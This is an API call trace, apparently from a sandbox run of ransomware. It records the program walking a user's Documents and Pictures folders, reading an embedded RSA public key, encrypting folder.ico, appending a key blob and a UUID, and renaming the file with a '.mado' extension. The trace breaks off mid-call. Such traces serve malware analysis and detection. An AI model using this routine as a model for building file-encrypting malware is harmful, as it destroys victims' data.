RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b74b68 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.883] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0205.883] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.883] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66a50 [0205.883] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.883] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.883] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.883] PathFindFileNameW (pszPath="") returned="" [0205.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.883] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.884] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.884] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0205.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.884] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0205.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.886] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=29926) returned 1 [0205.886] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.888] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.888] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.890] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.890] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x74e6, lpOverlapped=0x0) returned 1 [0205.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.891] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.891] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.892] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.892] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.892] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.892] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.892] GetLastError () returned 0x0 [0205.892] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.892] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.892] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.892] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.892] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.893] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x74e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.893] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.893] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.893] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.893] CloseHandle (hObject=0x63c) returned 1 [0205.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74b68 [0205.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed98 | out: hHeap=0x2c0000) returned 1 [0205.894] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.mado")) returned 1 [0205.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.895] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.896] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0205.896] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.896] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0205.896] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b74b68 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74b68 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b74b68 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b74b68 [0205.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\") returned="5DSZWpKJg8HwZKscy\\" [0205.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0205.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0205.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.900] PathFindFileNameW 